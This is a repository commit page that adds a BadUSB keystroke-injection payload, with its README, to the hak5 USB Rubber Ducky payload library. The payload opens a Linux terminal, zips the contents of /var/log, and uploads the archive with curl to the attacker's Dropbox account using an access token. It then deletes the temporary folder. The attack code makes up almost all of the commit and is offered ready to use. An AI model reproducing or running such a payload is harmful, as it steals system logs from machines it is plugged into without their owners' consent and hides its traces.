hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

[+] README.md file

pull/247/head
aleff-github 2023-03-07 11:57:46 +01:00
parent 79deedb1c8
commit b649432832
2 changed files with 113 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

33
payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md Normal file
View File

@ -0,0 +1,33 @@
# Exfiltrate Linux Log Files - BADUSB ✅
A script used to take linux logs.
**Category**: Exfiltration, Execution
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
## Description
A script used to take linux logs.
Opens a shel, zip all zippable (R permission) content of the log folder, send the zip into the dropbox folder, delete tmp folder.
## Getting Started
### Dependencies
* Internet Connection
* Linux System
* * Terminal that can be opened by the shortcommand CTRL-ALT t
* DropBox Account for the access token
### Executing program
* Plug in your device
### Settings
* Set your dropbox access token
* Change if needed the folder path interessed (i.e. /var/log)
* Change (if you think that it is necessary) the delay of the zipping operation

80
payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt Normal file
View File

@ -0,0 +1,80 @@
REM ######################################################
REM # |
REM # Title : Exfiltrate Linux Logs With Dropbox |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration, Execution |
REM # Target : Linux |
REM # |
REM ######################################################
REM Requirements:
REM - Internet Connection
REM - Dropbox Account
REM - - DROPBOX_ACCESS_TOKEN
DELAY 1000
CTRL-ALT t
REM Required: Set here your Dropbox access TOKEN
DELAY 2000
DEFINE TOKEN example
STRING ACCESS_TOKEN="
STRING TOKEN
STRING "
ENTER
DELAY 500
STRING USER_NAME=$(whoami)
ENTER
REM Create random num
DELAY 500
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
ENTER
REM Folder path
DELAY 500
STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX)
ENTER
REM Zip path
DELAY 500
STRING ZIP_NAME="$RANDOM.zip"
ENTER
DELAY 500
STRING ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME"
ENTER
REM Default log path
DELAY 500
STRING LOG_PATH="/var/log/"
ENTER
DELAY 500
STRING zip -r "$ZIP_PATH" "$LOG_PATH"
ENTER
REM Delay of zipping operation - it depends
DELAY 10000
DELAY 500
STRING DROPBOX_FOLDER="/$ZIP_NAME"
ENTER
REM Send to Dropbox function
DEFINE DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload
DELAY 500
STRING curl -X POST
STRING DROPBOX_API_LINK
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
ENTER
REM Send timing - it depends
DELAY 5000
DELAY 500
STRING rm -rf "$TMP_FOLDER_PATH"
ENTER